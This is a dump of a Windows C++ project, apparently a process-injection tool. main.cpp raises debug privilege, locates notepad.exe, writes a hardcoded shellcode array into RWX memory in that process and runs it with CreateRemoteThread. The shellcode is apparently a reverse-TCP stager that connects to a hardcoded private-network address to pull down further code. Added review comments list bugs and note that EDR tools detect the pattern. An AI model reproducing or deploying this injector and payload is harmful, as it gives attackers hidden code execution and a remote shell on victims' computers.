37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
--------------------------------------------------------------------------------
/ShellcodeInjection/ShellcodeInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/ShellcodeInjection/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | using namespace std;
// Attempts to enable SeDebugPrivilege on the current process token.
//
// NOTE(review): none of the three API return values is checked. If
// OpenProcessToken fails, hToken is uninitialised when it reaches
// AdjustTokenPrivileges; if LookupPrivilegeValue fails, luid is. The token
// handle is never closed. Compare the checked variant of this function in
// ReflectiveDLLInjection.cpp, which at least returns a BOOL.
void PrivilegeEscalation()
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tp;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}
// Walks a Toolhelp32 process snapshot and returns the PID of the first entry
// whose szExeFile equals target_process_name (exact, case-sensitive wcscmp),
// or 0 if the snapshot fails or no entry matches. Unlike GetProcessIdByName
// in ReflectiveDLLInjection.cpp, this one compares wide strings properly and
// includes the Process32First entry in the loop.
//
// NOTE(review): hSnapshot is never closed on any path (handle leak).
// NOTE(review): target_process_name is non-const even though it is only read;
// the caller passes a wide string literal.
DWORD m_WalkProcess(WCHAR *target_process_name)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hSnapshot)
    {
        return 0;
    }
    PROCESSENTRY32 pi;
    pi.dwSize = sizeof(PROCESSENTRY32);   // required by Process32First
    BOOL bRet = Process32First(hSnapshot, &pi);
    DWORD targetPid = 0;   // assigned but never returned; the match returns directly
    while (bRet)
    {
        //todo

        int res = wcscmp(pi.szExeFile, target_process_name);
        if (!res)
            return pi.th32ProcessID;
        bRet = Process32Next(hSnapshot, &pi);
    }
    return 0;
}
// Entry point: locates a process by name, enables SeDebugPrivilege, opens the
// process, allocates an RWX region in it, copies the byte array `buf` there
// and starts a remote thread at that address. The contents of `buf` are an
// opaque byte blob on this page and are not interpreted here.
//
// NOTE(review): m_target_id may be 0 (no match) and is passed to OpenProcess
// unchecked; the results of OpenProcess, VirtualAllocEx and
// WriteProcessMemory are likewise never checked, so a NULL handle or address
// flows straight into the next call. ER is captured but never used.
// NOTE(review): the allocation and copy sizes are the literal 1024, which is
// independent of the array's actual length.
// Monitoring note: the OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
// -> WriteProcessMemory -> CreateRemoteThread sequence against another
// process is the textbook remote-thread injection pattern that endpoint
// telemetry (ETW/EDR kernel callbacks) is designed to surface.
int main()
{
    unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x1f\x98\xc0\xa8\x0b\x89\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

    WCHAR *m_target_name = L"notepad.exe";   // string literal bound to non-const WCHAR*
    DWORD m_target_id = m_WalkProcess(m_target_name);   // 0 if not found; not checked
    PrivilegeEscalation();
    // PROCESS_CREATE_THREAD is already included in PROCESS_ALL_ACCESS.
    HANDLE injectionProcessHandle = ::OpenProcess(PROCESS_ALL_ACCESS | PROCESS_CREATE_THREAD, 0, m_target_id);
    LPVOID AllocAddr = VirtualAllocEx(injectionProcessHandle, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(injectionProcessHandle, AllocAddr, buf, 1024, NULL);
    DWORD ER = GetLastError();   // recorded but never reported
    HANDLE hRemoteThread;
    if ((hRemoteThread = CreateRemoteThread(injectionProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)AllocAddr, NULL, 0, NULL)) == NULL)
    {
        ER = GetLastError();
        cout << "Create Remote Thread Failed!" << endl;
        return FALSE;
    }
    system("pause");
    return 0;
}
--------------------------------------------------------------------------------